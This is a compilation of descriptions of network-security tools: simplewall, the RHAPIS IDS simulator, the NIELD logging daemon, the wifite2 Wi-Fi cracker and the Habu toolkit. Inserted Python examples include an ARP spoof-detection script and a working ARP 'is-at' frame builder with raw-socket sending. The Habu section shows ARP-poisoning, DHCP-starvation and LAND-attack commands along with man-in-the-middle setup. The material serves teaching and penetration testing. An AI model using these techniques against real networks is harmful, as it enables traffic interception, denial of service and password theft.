Termux ID: Network


Simple tool to configure the Windows Filtering Platform (WFP), which controls network activity on your computer.
The lightweight application is less than a megabyte and is compatible with Windows Vista and later. You can download either the installer or the portable version. Administrator rights are required for it to work correctly.

Features:
  • Simple interface without annoying pop-ups
  • Dropped packets notifications (Windows 7 and above)
  • Proxy support (Windows 8 and above) [BETA]
  • Internal blocklist (block Windows spy / telemetry)
  • Rules editor (create your own rules)
  • Free and open source
  • Localization support
  • IPv6 support
To activate portable mode, create "simplewall.ini" in the application folder, or move it there from "%APPDATA%\Henry++\simplewall".


SimpleWall - Simple tool to configure Windows Filtering Platform (WFP)



Network intrusion detection systems simulator. RHAPIS provides a simulation environment in which the user can execute any IDS operation.

Basic Usage
Type HELP in the console to see the available commands. RHAPIS is written in Lua, so you need Lua installed to run it.
The first commands you must enter to set up a virtual network intrusion detection system are the following:

SET NETIP1 [ip address]: base address of the network in which the NIDS is installed (network counters are 1-6).
SET HOSTIP1 [ip address]: address of a host inside the NIDS network (host counters are 1-6).
INCLUDE config: loads a random configuration file.
INCLUDE ruleset: reads the set of rules that the intrusion detection system will identify.
Now you have activated detectability.
SET ATTHOSTIP1 [ip address]: sets an attacker's identity. This lets you launch virtual attacks on arbitrary destinations with the ATTACK command afterwards.

Attacker host counters are again 1-6.
For your attacks to be recognized by the intrusion detection system, you must attack hosts that belong to the network the NIDS monitors.
For example:
SET HOSTIP1 7.7.7.7
ATTACK XSS 7.7.7.7
ATTACK XSS 9.9.9.9
DETECT XSS
In the above commands, the only attack the NIDS will identify is the one on destination address 7.7.7.7, because that is an active host of the network in which the NIDS is installed.

On the other hand, the attack on 9.9.9.9 will not be detected.
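The detection scope described above, as an added example in Python (RHAPIS itself is Lua, and this is not its code): a small interpreter for the SET / INCLUDE / ATTACK / DETECT lines that records attacks and reports only those whose destination is a configured HOSTIP. The meaning of INCLUDE ruleset is an assumption here (it is modelled as "recognize every attack type listed on this page"); the real simulator reads rules from a file.

```python
"""Toy model of the RHAPIS detection rule shown above: an attack is detected
only when a ruleset has been loaded and the destination is a host of the
monitored network. Added example (Python), not RHAPIS code, which is Lua;
the meaning of INCLUDE ruleset is assumed to be 'recognize all attack types'."""
import re

ATTACK_TYPES = {"DOS", "XSS", "RFI", "SQL", "SHELL", "REMBUFF", "MALWARE",
                "BRUTE", "ARP", "CSRF", "MASQUERADE", "PROBE", "HIJACK"}
SET_TARGET = re.compile(r"(ATTHOSTIP|ATTNETIP|HOSTIP|NETIP)([1-6])")


class NidsSimulator:
    def __init__(self):
        self.tables = {"NETIP": {}, "HOSTIP": {}, "ATTHOSTIP": {}, "ATTNETIP": {}}
        self.ruleset = set()   # attack types the NIDS can recognize
        self.traffic = []      # (attack type, destination ip) for every ATTACK

    def execute(self, line):
        """Run one console line; returns the detections for DETECT, else None."""
        tokens = line.split()
        cmd, args = tokens[0].upper(), tokens[1:]
        if cmd == "SET":
            m = SET_TARGET.fullmatch(args[0].upper())
            if not m:
                raise ValueError("unsupported SET target: %s" % args[0])
            self.tables[m.group(1)][int(m.group(2))] = args[1]
        elif cmd == "INCLUDE":
            if args[0].lower() == "ruleset":
                self.ruleset = set(ATTACK_TYPES)   # assumption: full ruleset
        elif cmd == "ATTACK":
            atype, dst = args[0].upper(), args[1]
            if atype not in ATTACK_TYPES:
                raise ValueError("unknown attack type: %s" % atype)
            self.traffic.append((atype, dst))
        elif cmd == "DETECT":
            return self.detect(args[0].upper())
        else:
            raise ValueError("command not modelled here: %s" % cmd)
        return None

    def detect(self, atype):
        """Destinations of recorded attacks of this type that the NIDS can see."""
        if atype not in self.ruleset:
            return []   # no ruleset loaded: detectability is not active
        monitored = set(self.tables["HOSTIP"].values())
        return [dst for t, dst in self.traffic if t == atype and dst in monitored]


if __name__ == "__main__":
    sim = NidsSimulator()
    for cmd in ("SET NETIP1 7.7.7.0", "SET HOSTIP1 7.7.7.7", "INCLUDE config",
                "INCLUDE ruleset", "SET ATTHOSTIP1 6.6.6.6",
                "ATTACK XSS 7.7.7.7", "ATTACK XSS 9.9.9.9"):
        sim.execute(cmd)
    print(sim.execute("DETECT XSS"))   # only 7.7.7.7 is inside the monitored network
```

The same sequence without INCLUDE ruleset detects nothing, which is the "detectability" step the basic usage above insists on.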

Simulator Commands
ATTACK [type of attack] [destination IP address] = DOS,XSS,RFI,SQL,SHELL,REMBUFF,MALWARE,BRUTE,ARP,CSRF,MASQUERADE,PROBE,HIJACK
REPEAT [type of attack] = DOS,SHELL,REMBUFF,CSRF,SQL,XSS,ARP,RFI
GENERATE [type of traffic] [number of packets] = IN,OUT,MAL
SEND [type of packets] [number of packets] [destination IP address] = ACK,TCP,RST,FIN,MALF,UDP,SYN
INCLUDE ruleset,config
SET [network/hosts] [IP address] = NETIP1,NETIP2,NETIP3,NETIP4,NETIP5,HOSTIP1,HOSTIP2,HOSTIP3,HOSTIP4,HOSTIP5,HOSTIP6,ATTHOSTIP1,ATTHOSTIP2,ATTHOSTIP3,ATTHOSTIP4,ATTHOSTIP5,ATTHOSTIP6,ATTNETIP1,ATTNETIP2,ATTNETIP3,ATTNETIP4,ATTNETIP5
HIDE/UNHIDE [undetectability] = MIX,DC
ATTEMPT [type of attack] [destination IP address] = DOS,XSS,LDAP,XPATH,SHELL
DETECT [type of attack] = DOS,XSS,RFI,SQL,SHELL,REMBUFF,MALWARE,BRUTE,ARP,CSRF,MASQUERADE,PROBE,HIJACK
ANALYZE [type of data] = HEX/FRAMES
The remaining commands are:
ALARMS, VISUALIZE, DATASET, INTRUDERS, HELP, INFO, ANONYMIZE

Examples
ATTACK DOS 7.7.7.7
ATTACK SHELL 2.2.2.2
GENERATE IN 660
DETECT SHELL
GENERATE MAL 1500
ATTACK MALWARE 5.5.5.5
DATASET
ATTEMPT XSS 10.10.10.10
Inside the main directory you can find log files for every kind of information entered on the RHAPIS console (datasets, alarms, configuration, intruders, etc.).


RHAPIS - Network Intrusion Detection Systems Simulator


NIELD (Network Interface Events Logging Daemon) is a tool that receives notifications from the kernel through a netlink socket and generates logs related to interfaces, the neighbour cache (ARP, NDP), IP addresses (IPv4, IPv6), routing, FIB rules and traffic control.

Download 
$ git clone https://github.com/t2mune/nield.git

Install
$ ./configure
$ make
# make install

Usage
nield [-vh46inarft] [-p lock_file] [-s buffer_size] [-l log_file] [-L syslog_facility] [-d debug_file]

Options
Standard options:

-v Displays the version and exits.

-h Displays the usage and exits.

-p lock_file
Specifies the lock file to use. The default is "/var/run/nield.pid".

-s buffer_size
Specifies the maximum socket receive buffer in bytes.

Logging options:
The log file "/var/log/nield.log" is used if neither "-l" nor "-L" is specified.

-l log_file
Specifies the log file to use.

-L syslog_facility
Specifies the syslog facility to use when logging events via syslog.

The standard syslog facilities are as follows:
auth, authpriv, cron, daemon, ftp, kern, lpr, mail, mark, news, security, syslog,
user, uucp, local0, local1, local2, local3, local4, local5, local6, local7

-d debug_file
Specifies the debug file to use.

Event options:
All events are received if no event option is specified.

-4 Logging events related to IPv4.

-6 Logging events related to IPv6.

-i Logging events related to interfaces.

-n Logging events related to the neighbour cache (ARP, NDP).

-a Logging events related to IP address.

-r Logging events related to routing.

-f Logging events related to fib rules.

-t Logging events related to traffic control.

Files
/usr/sbin/nield
/var/run/nield.pid
/var/log/nield.log
/usr/share/man/man8/nield.8

Examples 
Interface
When an interface was disabled by command:
[2013-08-07 04:27:31.537101] interface eth0 state changed to disabled
When an interface has gone down:
[2013-08-07 04:27:31.537125] interface eth0 state changed to down
When an interface was enabled by command:
[2013-08-07 04:27:37.639079] interface eth0 state changed to enabled
When an interface has come up:
[2013-08-07 04:27:40.267577] interface eth0 state changed to up
When link layer address of an interface changed:
[2013-08-07 04:27:43.645661] interface eth0 link layer address changed from f6:af:fc:41:9e:7d to be:ee:bd:3d:22:68
When mtu of an interface changed:
[2013-08-07 04:27:49.775200] interface eth0 mtu changed from 1500 to 1400
When a vlan interface was added:
[2013-08-07 04:27:55.904868] interface added: name=eth0.100 link=eth0 lladdr=f6:af:fc:41:9e:7d mtu=1500 kind=vlan vid=100 state=disabled,linkdown
When a vlan interface was deleted:
[2013-08-07 04:28:13.924831] interface deleted: name=eth0.100 link=eth0 lladdr=f6:af:fc:41:9e:7d mtu=1500 kind=vlan vid=100 state=disabled,linkdown
When a vxlan interface was added:
[2013-08-07 06:30:08.938025] interface added: name=vxlan0 lladdr=9e:c5:83:a8:ea:00 mtu=1500 kind=vxlan vnid=100 local=192.168.1.100 group=224.0.0.100 state=disabled,linkdown
When a vxlan interface was deleted:
[2013-08-07 06:30:27.378033] interface deleted: name=vxlan0 lladdr=9e:c5:83:a8:ea:00 mtu=1500 kind=vxlan vnid=100 local=192.168.1.100 group=224.0.0.100 state=disabled,linkdown
When a bridge interface was added:
[2013-08-07 04:28:19.938136] interface added: name=br0 lladdr=f2:60:df:71:d0:ae mtu=1500 kind=bridge state=disabled,linkdown
When a tap interface was added:
[2013-08-07 04:28:31.951485] interface added: name=tap0 lladdr=52:4e:47:b3:e2:00 mtu=1500 kind=tun state=disabled,linkdown
When a tap interface was attached to an ethernet bridge:
[2013-08-07 04:28:37.958396] interface tap0 attached to bridge br0
When a tap interface was detached from an ethernet bridge:
[2013-08-07 04:28:55.977159] interface tap0 detached from bridge br0
When a tap interface was deleted:
[2013-08-07 04:29:01.983806] interface deleted: name=tap0 lladdr=52:4e:47:b3:e2:00 mtu=1500 kind=tun state=disabled,linkdown
When a bridge interface was deleted:
[2013-08-07 04:29:14.006774] interface deleted: name=br0 lladdr=00:00:00:00:00:00 mtu=1500 kind=bridge state=disabled,linkdown
When a bonding interface was added:
[2013-08-07 04:29:20.027673] interface added: name=bond0 lladdr=00:00:00:00:00:00 mtu=1500 kind=bond state=disabled,linkdown
When an interface was attached to a bonding interface:
[2013-08-07 04:29:32.085061] interface eth0 attached to bonding bond0
When an interface was detached from a bonding interface:
[2013-08-07 04:30:09.101576] interface eth0 detached from bonding bond0
When a bonding interface was deleted:
[2013-08-07 04:30:27.644523] interface deleted: name=bond0 lladdr=00:00:00:00:00:00 mtu=1500 kind=bond state=disabled,linkdown
When a gre interface was added:
[2013-08-07 04:30:33.678351] interface added: name=gre0 local=192.168.1.100 remote=192.168.2.100 mtu=1476 kind=gre state=disabled,linkdown
When a gre interface was deleted:
[2013-08-07 04:30:51.698009] interface deleted: name=gre0 local=192.168.1.100 remote=192.168.2.100 mtu=1476 kind=gre state=disabled,linkdown
When a gretap interface was added:
[2013-08-07 04:30:57.716615] interface added: name=gretap0 lladdr=a2:52:ec:ec:78:60 mtu=1462 kind=gretap local=192.168.1.100 remote=192.168.2.100 state=disabled,linkdown
When a gretap interface was deleted:
[2013-08-07 04:31:15.736468] interface deleted: name=gretap0 lladdr=a2:52:ec:ec:78:60 mtu=1462 kind=gretap local=192.168.1.100 remote=192.168.2.100 state=disabled,linkdown
When an IPv4 tunnel interface(ipip,sit,isatap) was added:
[2013-08-07 04:31:21.755082] interface added: name=iptnl0 local=192.168.1.100 remote=192.168.2.100 mtu=1480 state=disabled,linkdown
When an IPv4 tunnel interface(ipip,sit,isatap) was deleted:
[2013-08-07 04:31:39.774847] interface deleted: name=iptnl0 local=192.168.1.100 remote=192.168.2.100 mtu=1480 kind=ipip state=disabled,linkdown
When an IPv6 tunnel interface(ip6ip6,ipip6) was added:
[2013-08-07 04:32:58.112423] interface added: name=ip6tnl0 local=2001:db8:10::1 remote=2001:db8:20::1 mtu=1452 state=disabled,linkdown
When an IPv6 tunnel interface(ip6ip6,ipip6) was deleted:
[2013-08-07 04:33:16.132706] interface deleted: name=ip6tnl0 local=2001:db8:10::1 remote=2001:db8:20::1 mtu=1452 kind=ip6tnl state=disabled,linkdown

IPv4 ARP
When an ARP cache entry was created:
[2013-08-07 04:33:28.157183] arp cache added: ip=192.168.1.2 mac=00:1b:8b:84:36:dc interface=eth0
When an ARP cache entry has expired:
[2013-08-07 06:11:14.516780] arp cache deleted: ip=192.168.1.2 mac=00:1b:8b:84:36:dc interface=eth0
When an ARP cache entry was cleared by command:
[2013-08-07 04:33:34.164063] arp cache invalidated: ip=192.168.1.2 mac=00:00:00:00:00:00 interface=eth0
When an ARP cache entry was unresolved:
[2013-08-07 06:10:06.204374] arp cache unresolved: ip=192.168.1.2 mac=00:00:00:00:00:00 interface=eth0
When link layer address of an entry in the ARP cache table has changed:
[2013-08-07 06:17:50.355827] arp cache changed: ip=192.168.1.2 mac=00:1b:8b:84:36:dc interface=eth0

IPv6 NDP
When a NDP cache entry was created:
[2013-08-07 04:34:28.221875] ndp cache added: ip=2001:db8::2 mac=00:1b:8b:84:36:dc interface=eth0
When a NDP cache entry has expired:
[2013-08-07 06:20:00.084350] ndp cache deleted: ip=2001:db8::2 mac=00:1b:8b:84:36:dc interface=eth0
When a NDP cache entry was cleared by command:
[2013-08-07 04:34:34.229066] ndp cache invalidated: ip=2001:db8::2 mac=00:00:00:00:00:00 interface=eth0
When a NDP cache entry was unresolved:
[2013-08-07 04:34:34.229066] ndp cache unresolved: ip=2001:db8::2 mac=00:00:00:00:00:00 interface=eth0
When link layer address of an entry in the NDP cache table has changed:
[2013-08-07 06:21:57.396102] ndp cache changed: ip=2001:db8::2 mac=00:1b:8b:84:36:dc interface=eth0
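The neighbour-cache events above are the ones a defender cares about most: an "arp cache changed" or "ndp cache changed" line that binds an existing IP to a different MAC is the footprint of ARP/NDP spoofing (see the habu.arpoison section further down). The following is an added example, not part of NIELD: a parser for the log-line format shown above plus a pass that reports such MAC flips. SAMPLE_LOG is constructed in that format (the de:ad:be:ef MAC is invented). A flip can also be legitimate (DHCP reuse, replaced NIC), so treat an alert as a lead, not a verdict.

```python
"""Detection pass over NIELD-style neighbour-cache lines: flag an IP whose
resolved MAC changes to a different address, a classic ARP/NDP spoofing
indicator. Added example, not part of NIELD; SAMPLE_LOG is constructed in the
line format shown above."""
import re

NEIGH_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] (?P<proto>arp|ndp) cache "
    r"(?P<event>added|deleted|invalidated|unresolved|changed): "
    r"ip=(?P<ip>\S+) mac=(?P<mac>\S+) interface=(?P<ifc>\S+)$"
)
ZERO_MAC = "00:00:00:00:00:00"

# Constructed sample in NIELD's format; the second line is a non-neighbour event.
SAMPLE_LOG = """\
[2013-08-07 04:33:28.157183] arp cache added: ip=192.168.1.2 mac=00:1b:8b:84:36:dc interface=eth0
[2013-08-07 04:33:40.170235] ipv4 route added: destination=172.16.1.0/24 nexthop=192.168.1.2 interface=eth0 type=unicast protocol=boot table=main
[2013-08-07 06:10:06.204374] arp cache unresolved: ip=192.168.1.2 mac=00:00:00:00:00:00 interface=eth0
[2013-08-07 06:17:50.355827] arp cache changed: ip=192.168.1.2 mac=de:ad:be:ef:00:01 interface=eth0
[2013-08-07 06:21:00.000000] ndp cache added: ip=2001:db8::2 mac=00:1b:8b:84:36:dc interface=eth0
[2013-08-07 06:21:57.396102] ndp cache changed: ip=2001:db8::2 mac=00:1b:8b:84:36:dc interface=eth0
"""


def parse_neigh_event(line):
    """Dict of fields for an arp/ndp cache line, None for any other NIELD line."""
    m = NEIGH_RE.match(line.strip())
    return m.groupdict() if m else None


def find_mac_flips(lines):
    """Remember the last non-zero MAC per (interface, ip); report every added or
    changed event that binds the ip to a different non-zero MAC."""
    last_mac = {}
    alerts = []
    for line in lines:
        ev = parse_neigh_event(line)
        if ev is None or ev["event"] not in ("added", "changed"):
            continue            # not a neighbour event, or no new binding
        if ev["mac"] == ZERO_MAC:
            continue            # invalidated/unresolved style entry, no address yet
        key = (ev["ifc"], ev["ip"])
        prev = last_mac.get(key)
        if prev is not None and prev != ev["mac"]:
            alerts.append({"time": ev["ts"], "proto": ev["proto"], "interface": ev["ifc"],
                           "ip": ev["ip"], "old_mac": prev, "new_mac": ev["mac"]})
        last_mac[key] = ev["mac"]
    return alerts


if __name__ == "__main__":
    for a in find_mac_flips(SAMPLE_LOG.splitlines()):
        print("%(time)s %(proto)s %(interface)s %(ip)s: %(old_mac)s -> %(new_mac)s" % a)
```

Run it against /var/log/nield.log (or the file given with -l) to get the same output; the "changed" line for 2001:db8::2 repeats the existing MAC and so produces no alert.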

IPv4 Address
When an IPv4 address was assigned:
[2013-08-07 04:33:22.150078] ipv4 address added: interface=eth0 ip=192.168.1.1/24 socpe=global
When an IPv4 address was removed:
[2013-08-07 04:34:04.195166] ipv4 address deleted: interface=eth0 ip=192.168.1.1/24 socpe=global

IPv6 Address
When an IPv6 address was assigned:
[2013-08-07 04:34:23.810337] ipv6 address added: interface=eth0 ip=2001:db8::1/64 socpe=global
When an IPv6 address was removed:
[2013-08-07 04:35:04.262540] ipv6 address deleted: interface=eth0 ip=2001:db8::1/64 socpe=global

IPv4 Route
When an IPv4 route was added:
[2013-08-07 04:33:40.170235] ipv4 route added: destination=172.16.1.0/24 nexthop=192.168.1.2 interface=eth0 type=unicast protocol=boot table=main
When an IPv4 route was removed:
[2013-08-07 04:33:46.176411] ipv4 route deleted: destination=172.16.1.0/24 nexthop=192.168.1.2 interface=eth0 type=unicast proto=boot table=main

IPv6 Route
When an IPv6 route was added:
[2013-08-07 04:34:40.235651] ipv6 route added: destination=2001:db8:1::/64 nexthop=2001:db8::2 interface=eth0 metric=1024 type=unicast protocol=boot table=main
When an IPv6 route was removed:
[2013-08-07 04:34:46.242398] ipv6 route deleted: destination=2001:db8:1::/64 nexthop=2001:db8::2 interface=eth0 metric=1024 type=unicast proto=boot table=main

IPv4 FIB Rule
When an IPv4 rule was added:
[2013-08-07 04:35:22.281834] ipv4 rule added: from=192.168.1.0/24 table=unknown priority=32765 action=to_tbl
When an IPv4 rule was deleted:
[2013-08-07 04:35:28.288220] ipv4 rule deleted: from=192.168.1.0/24 table=unknown priority=32765 action=to_tbl

IPv6 FIB Rule
When an IPv6 rule was added:
[2013-08-07 04:35:34.294521] ipv6 rule added: from=2001:db8:1::/64 table=unknown priority=16383 action=to_tbl
When an IPv6 rule was deleted:
[2013-08-07 04:35:40.300824] ipv6 rule deleted: from=2001:db8:1::/64 table=unknown priority=16383 action=to_tbl

Traffic Control
When a qdisc was added:
[2013-08-07 04:37:46.502234] tc qdisc added: interface=eth0 parent=root classid=1: qdisc=htb rate2quantum=10 default-class=0x12
When a qdisc was deleted:
[2013-08-07 04:37:52.516665] tc qdisc deleted: interface=eth0 parent=root classid=1: qdisc=htb rate2quantum=10 default-class=0x12
When a class was added:
[2013-08-07 04:37:46.503530] tc class added: interface=eth0 parent=root classid=1:1 qdisc=htb rate=800.000(kbit/s) burst=1.562(Kbyte) ceil=1.600(Mbit/s) cburst=3.125(Kbyte) level=0 prio=0
When a class was deleted:
[2013-08-07 04:37:52.515528] tc class deleted: interface=eth0 parent=root classid=1:1 qdisc=htb rate=800.000(kbit/s) burst=1.562(Kbyte) ceil=1.600(Mbit/s) cburst=3.125(Kbyte) level=0 prio=0
When a filter was added:
[2013-08-07 04:40:28.814964] tc filter added: interface=eth0 handle=801::800 priority=10 protocol=ip filter=u32 classid=1:2 hash(table/bucket)=0x801/0x0
[2013-08-07 04:40:28.814990] tc filter added: interface=eth0 handle=801::800 priority=10 protocol=ip filter=u32 flags=terminal offshift=0 nkeys=2 offmask=0x0000 off=0 offoff=0 hoff=0 hmask=0x00000000
[2013-08-07 04:40:28.815007] tc filter added: interface=eth0 handle=801::800 priority=10 protocol=ip filter=u32 key=1 value=0xc0a86404 mask=0xffffffff offset=16 offmask=0x00000000
[2013-08-07 04:40:28.815020] tc filter added: interface=eth0 handle=801::800 priority=10 protocol=ip filter=u32 key=2 value=0xc0a86403 mask=0xffffffff offset=12 offmask=0x00000000
[2013-08-07 04:40:28.815099] tc filter added: interface=eth0 handle=801::800 priority=10 protocol=ip filter=u32 order=1 action=police index=1 rate=1.000(Mbit/s) burst=128.000(Kbyte) latency=0.000(us) exceed=drop
When a filter was deleted:
[2013-08-07 04:40:34.830414] tc filter deleted: interface=eth0 handle=:: priority=10 protocol=ip filter=u32
When an action was added:
[2013-08-07 04:40:10.769257] tc action added: order=1 action=nat index=20 from=192.168.1.0/24 to=192.168.2.1 direction=ingress


NIELD v0.6.1 - Network Interface Events Logging Daemon

A complete re-write of wifite, a Python script for auditing wireless networks.

What's new?
  • Lots of files instead of "one big script".
  • Cleaner process management -- No longer leaves processes running in the background.
  • UX: Target access points are refreshed every second instead of every 5 seconds.
  • UX: Displays the real-time power level (in dB) of the currently attacked target

What's not new?
  • Backwards compatibility with the original wifite's arguments.
  • Same text-based interface everyone knows and loves.

Full Feature List
  • Reaver Pixie-Dust attack (--pixie)
  • Reaver WPS PIN attack (--reaver)
  • WPA handshake capture (--no-reaver)
  • Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng
  • Various WEP attacks (replay, chopchop, fragment, etc)
  • 5GHz support for wireless cards that support 5GHz (use the -5 option)
  • Stores cracked passwords and handshakes in the current directory, with metadata about the access point (view them with the --cracked command).
  • Decloaks hidden access points when the channel is fixed (use the -c <channel> option)
  • Provides commands to crack captured WPA handshakes (via --crack command)

Support
Wifite2 is designed entirely for the latest version of Kali Rolling release (tested on Kali 2016.2, updated May 2017).
This means only the latest versions of these programs are supported: Aircrack-ng suite, wash, reaver, tshark, cowpatty.
Other pen-testing distributions (such as BackBox) have outdated versions of these suites; these distributions are not supported.

Installing & Running
git clone https://github.com/derv82/wifite2.git
cd wifite2
./Wifite.py

Screenshots

Decloaking & cracking a hidden access point (via the WPA Handshake attack):


Cracking a weak WEP password (using the WEP Replay attack):


Various cracking options (using --crack option):



Wifite 2 - A complete re-write of Wifite (Automated Wireless Attack Tool)


Habu is meant to teach (and learn) some concepts about Python and network hacking.
These are basic functions that help with some tasks in ethical hacking and penetration testing.
Most of them are related to networking, and the implementations are intended to be understandable for anyone who wants to read the source code and learn from it.

Some techniques implemented in the current version are:
  • ARP Poisoning
  • ARP Sniffing
  • DHCP Discover
  • DHCP Starvation
  • LAND Attack
  • SNMP Cracking
  • SYN Flooding
  • TCP Flags Analysis
  • TCP ISN Analysis
  • TCP Port Scan


Installation
To install Habu, simply:
$ pip3 install habu


Dependencies
Habu requires:
  • Click
  • Python (3.x),
  • Scapy-Python3
  • Matplotlib (Optional, only needed if you want to make some graphs)


Get Help
All the commands implement the '--help' option, which shows the help, arguments, options and default values.


Verbose Mode
Almost all commands implement verbose mode with the '-v' option, which gives you some extra information about what habu is doing.


habu.arpoison: ARP Poisoning
This command sends ARP 'is-at' packets to each victim, poisoning their ARP tables so that they send their traffic to your system.
$ sudo habu.arpoison 192.168.1.5 192.168.1.6
Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.6
Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.5
Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.6
Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.5
...
Note: If you want a fully working Man-in-the-Middle attack, you need to enable packet forwarding on your operating system so that it acts like a router. On Linux you can do that with:
echo 1 > /proc/sys/net/ipv4/ip_forward
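What an 'is-at' packet actually is, as an added example (this is not habu's code; habu builds these frames with scapy): an Ethernet frame carrying an unsolicited ARP reply that claims "sender_ip is-at sender_mac". The attack works because most stacks update their ARP table from any reply they receive, solicited or not. The MACs and IPs below are constructed (they reuse the format of the arpsniff output further down); in practice you must learn the victim's MAC first, and send_frame needs root on Linux.

```python
"""Hand-built ARP 'is-at' (reply) frame of the kind habu.arpoison sends, plus a
decoder. Added example, not habu's code (habu uses scapy). Addresses are
constructed; sending needs a raw AF_PACKET socket and root on Linux."""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def build_arp_is_at(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II + ARP reply telling target 'sender_ip is-at sender_mac'."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # htype ethernet, ptype IPv4
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp                                           # 14 + 28 = 42 bytes


def parse_arp(frame):
    """Decode an Ethernet/ARP frame into a dict; ValueError if it is not one."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an Ethernet/ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    return {
        "op": {ARP_REQUEST: "who-has", ARP_REPLY: "is-at"}.get(op, str(op)),
        "sender_mac": mac_str(frame[22:28]), "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": socket.inet_ntoa(frame[38:42]),
    }


def send_frame(ifname, frame):
    """Inject the frame on ifname (Linux only, needs CAP_NET_RAW / root)."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((ifname, 0))
        return s.send(frame)


if __name__ == "__main__":
    # Constructed: tell 192.168.1.5 (at 64:bc:...) that the gateway 192.168.1.1 is at our MAC.
    frame = build_arp_is_at("00:c2:c6:30:2c:58", "192.168.1.1",
                            "64:bc:0c:33:e5:57", "192.168.1.5")
    print(parse_arp(frame))
```

habu.arpoison sends one such frame per victim, repeatedly, so the poisoned entry never ages out. The defensive counterpart is the MAC-flip check in the NIELD section above, or static ARP entries / Dynamic ARP Inspection on the switch.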


habu.arpsniff: Discover devices on your LAN capturing ARP packets
This command listens for ARP packets and shows information about each device.
Columns: Seconds since last packet | IP | MAC | Vendor
1   192.168.0.1   a4:08:f5:19:17:a4   Sagemcom Broadband SAS
7   192.168.0.2   64:bc:0c:33:e5:57   LG Electronics (Mobile Communications)
2   192.168.0.5   00:c2:c6:30:2c:58   Intel Corporate
6   192.168.0.7   54:f2:01:db:35:58   Samsung Electronics Co.,Ltd


habu.contest: Check your connection capabilities
This command tries to connect to various services and checks whether you can reach them over your internet connection.
$ habu.contest
IP: True
DNS: True
FTP: True
SSH: True
HTTP: True
HTTPS: True


habu.dhcp_discover: Discover DHCP servers
This command sends a DHCP request and shows which devices have replied. With the '-v' (verbose) parameter you can see all the options (like DNS servers) included in the responses.
$ sudo habu.dhcp_discover
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.5:bootpc / BOOTP / DHCP


habu.dhcp_starvation: Fill the DHCP leases
This command sends multiple DHCP requests from forged MAC addresses to exhaust the DHCP server's lease pool. Once all the available network addresses are assigned, the DHCP server stops answering, which makes attacks like DHCP spoofing (answering new clients from a rogue server) possible.
$ sudo habu.dhcp_starvation
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.6:bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.7:bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.8:bootpc / BOOTP / DHCP


habu.eicar: Prints the EICAR test string
This command prints the EICAR test string, which can be used to test antimalware engines. More info: http://www.eicar.org/86-0-Intended-use.html
$ habu.eicar
X5O!P%@AP[4\XZP54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Note: The string above is deliberately incorrect, because it is not a good idea to write the complete string in this text file: some antivirus programs would detect it as a virus. :)


habu.hasher: Computes various hashes with the input data
This command computes various hashes for the input data, which can be a file or a stream.
If the filename is '-', the data is taken from standard input (stdin), so there are three different ways to call this command:
$ habu.hasher README.rst
md5 : 375375d9cfb2aacab7c8d1a9afd3d9b7
sha1 : 21c67b9ef44bc24d47eef6adab648ba34662927e

$ cat README.rst | habu.hasher -
md5 : 375375d9cfb2aacab7c8d1a9afd3d9b7
sha1 : 21c67b9ef44bc24d47eef6adab648ba34662927e

$ habu.hasher - < README.rst
md5 : 375375d9cfb2aacab7c8d1a9afd3d9b7
sha1 : 21c67b9ef44bc24d47eef6adab648ba34662927e
Note: The output above shows only MD5 and SHA1 to make it short, but the real output includes more algorithms.
You can also specify which algorithm to use. In such case, the output is only the value of the calculated hash:
$ habu.hasher -a md5 README.rst
375375d9cfb2aacab7c8d1a9afd3d9b7


habu.ip: Prints your current public IP
This command prints your current public IP based on the response from https://api.ipify.org.
$ habu.ip
182.26.32.246


habu.isn: Prints the TCP sequence numbers for an IP
This command creates TCP connections and prints the TCP initial sequence number of each connection.
$ sudo habu.isn www.portantier.com
1962287220
1800895007
589617930
3393793979
469428558
You can get a graphical representation (requires the matplotlib package) with the '-g' option:
$ sudo habu.isn -g -c 10 www.portantier.com
Note: The above command uses the '-c' option to specify that 10 connections must be created.


habu.land: Implements the LAND attack
This command implements the LAND attack, which sends packets whose source IP address is forged to be the same as the destination IP address, using the same source and destination port as well.
The attack is very old and can be used to cause a Denial of Service on old systems such as Windows NT 4.0. More information: https://en.wikipedia.org/wiki/LAND
$ sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many packets to send with the '-c' option; the default is to never stop. You can also specify the destination port with the '-p' option.


habu.ping: ICMP echo requests
This command implements the classic 'ping' with ICMP echo requests.
$ sudo habu.ping 8.8.8.8
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding


habu.snmp_crack: SNMP Community Cracker
This command launches snmp-get queries against an IP and tells you when it finds a valid community string (it is a simple SNMP cracker).
